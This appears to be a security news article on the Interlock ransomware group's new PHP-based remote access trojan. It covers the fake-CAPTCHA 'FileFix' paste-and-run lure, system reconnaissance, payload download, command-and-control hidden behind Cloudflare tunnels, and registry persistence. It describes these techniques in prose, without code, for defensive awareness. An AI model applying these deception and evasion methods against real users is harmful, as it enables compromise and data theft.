The Interlock ransomware group, a name that has become synonymous with cyber threats, has made a significant change to its arsenal. They are now deploying a new version of their Remote Access Trojan (RAT) that uses PHP, a common web scripting language. This is a big shift from their earlier tool, which was based on JavaScript and Node.js. Since May 2025, this new PHP variant has been connected to a group of online criminals known as the KongTuke (LandUpdate808) threat cluster, with the PHP version specifically appearing in June. This change means the malware can potentially affect more systems and operate in new ways.
How They Trick Victims: The FileFix Method
The way Interlock spreads this new malware is quite sneaky. They use a method called FileFix, which is an updated version of a trick called ClickFix. The whole process starts on websites that have been secretly tampered with. These compromised websites have a hidden piece of code embedded in their HTML. This code then makes a fake CAPTCHA check appear on the victim’s screen, asking them to “Verify you are human.” To do this, the victim is prompted to open a “run command” and paste something from their clipboard. If the victim falls for this trick and pastes the content, it runs a PowerShell script. This script then secretly launches the PHP-based RAT, giving the attackers a way into the computer.
What the New Malware Can Do
Once the Interlock RAT gets onto a computer, it’s designed to do a lot of damage. It immediately starts to gather information about the system, a process known as “system reconnaissance.” It checks the user’s privilege level (whether they are a regular user, an administrator, or a system user) and then collects detailed system information, like what processes are running, services, drives, and network details, all neatly packaged in a JSON format. After collecting this data, it connects to a remote server to download and run more harmful files, such as executable (.exe) or dynamic link library (.dll) files. The malware can also perform “hands-on-keyboard discovery,” meaning it can actively look for information by querying things like Active Directory, user accounts, and domain controllers, showing that the attackers are directly interacting with the compromised system.
Algoritha: The Most Trusted Name in BFSI Investigations and DFIR Services
Staying Hidden and Resilient
One of the most concerning aspects of this new Interlock RAT is its ability to stay hidden and keep working even when faced with security measures. The malware sets up a very strong “command and control” (C2) channel, which is how it communicates with the attackers. It does this by using legitimate Cloudflare Tunnel URLs (specifically trycloudflare.com), which helps to hide the true location of the C2 server. This makes it much harder for cybersecurity experts to track down where the attacks are coming from. To make sure it can always communicate, even if Cloudflare Tunnel is disrupted, the malware also has backup IP addresses built into its code. The Interlock RAT is also capable of executing various commands, setting up ways to stay on the system (persistence) using registry keys, and even shutting itself down.